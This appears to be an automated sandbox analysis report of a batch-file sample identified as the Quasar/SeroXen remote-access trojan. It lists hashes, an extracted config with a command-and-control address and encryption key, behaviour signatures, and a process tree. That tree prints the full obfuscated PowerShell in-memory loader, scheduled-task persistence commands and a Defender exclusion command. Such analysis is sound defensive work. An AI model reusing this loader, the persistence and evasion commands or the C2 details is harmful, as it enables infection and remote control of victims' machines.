Analysis
max time kernel: 147s
max time network: 150s
platform: windows11-21h2_x64
resource: win11-20240426-en
resource tags: arch:x64, arch:x86, image:win11-20240426-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 28-04-2024 16:14
Static task: static1
Behavioral task: behavioral1
  Sample: rename me.bat
  Resource: win10-20240404-en
Behavioral task: behavioral2
  Sample: rename me.bat
  Resource: win10v2004-20240426-en
General
Target: rename me.bat
Size: 514KB
MD5: 414264bb47935bed191128cf44f3a2cd
SHA1: df49e4f8bc8d388c9b9398f29b0de0e72e79b130
SHA256: a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef
SHA512: c15ca12cd576157369574c3a51ece0879ccee3b57614af91d6e99af21e8fdeb46d1680e2692a38d4da6b4ebb63f9e17341d0cc6ac616e6c2ebd36e698e588e66
SSDEEP: 12288:40xb2yL+sSyycyuVWTuM+EiWCCPt2EIKgEtoOT9ah:46bTLrSyycy9uM+EipCfhgTOTAh
Malware Config
Extracted
quasar
3.1.5
SeroXen
147.185.221.19:33587
$Sxr-2rfrZTKITtK0P0zGYG
  encryption_key: Yr0YpBPNd3kXsl43jZMx
  install_name: $sxr-sdinwn.exe
  log_directory: $sxr
  reconnect_delay: 3000
  startup_key: $sxr-metsha
  subdirectory: sxr
Signatures
Quasar payload 1 IoCs
  Processes:
    resource: behavioral3/memory/4004-75-0x0000000007B80000-0x0000000007BEE000-memory.dmp
    yara_rule: family_quasar
Blocklisted process makes network request 1 IoCs
  Processes:
    flow: 2, pid: 4004, process: powershell.exe
Drops file in Drivers directory 1 IoCs
  Processes:
    description: File opened for modification
    ioc: C:\Windows\system32\drivers\etc\hosts
    process: powershell.exe
Executes dropped EXE 1 IoCs
  Processes:
    pid: 3808, process: $sxr-sdinwn.exe
Looks up external IP address via web service 1 IoCs
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow: 1, ioc: ip-api.com
Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) 1 TTPs 1 IoCs
  Schtasks is often used by malware for persistence or to perform post-infection execution.
Gathers network information 2 TTPs 1 IoCs
  Uses commandline utility to view network configuration.
  Processes:
    pid: 1936, process: ipconfig.exe
Modifies registry class 1 IoCs
  Processes:
    description: Key created
    ioc: \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000_Classes\Local Settings
    process: powershell.exe
Suspicious behavior: EnumeratesProcesses 10 IoCs
  Processes:
    pid: 1012, process: powershell.exe
    pid: 1012, process: powershell.exe
    pid: 4472, process: powershell.exe
    pid: 4472, process: powershell.exe
    pid: 4004, process: powershell.exe
    pid: 4004, process: powershell.exe
    pid: 3808, process: $sxr-sdinwn.exe
    pid: 1840, process: powershell.exe
    pid: 3808, process: $sxr-sdinwn.exe
    pid: 1840, process: powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 27 IoCs
Processes
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rename me.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rename me.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rename me.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_454_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_454.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_454.vbs"
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_454.bat" "
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_454.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_454.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          - Blocklisted process makes network request
          - Drops file in Drivers directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
          - C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
            - Creates scheduled task(s)
          - C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe
            "C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
          - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath (Get-Item -LiteralPath $env:SystemRoot).Root"
            - Suspicious behavior: EnumeratesProcesses
          - C:\Windows\SysWOW64\ipconfig.exe
            "C:\Windows\System32\ipconfig.exe" /flushdns
            - Gathers network information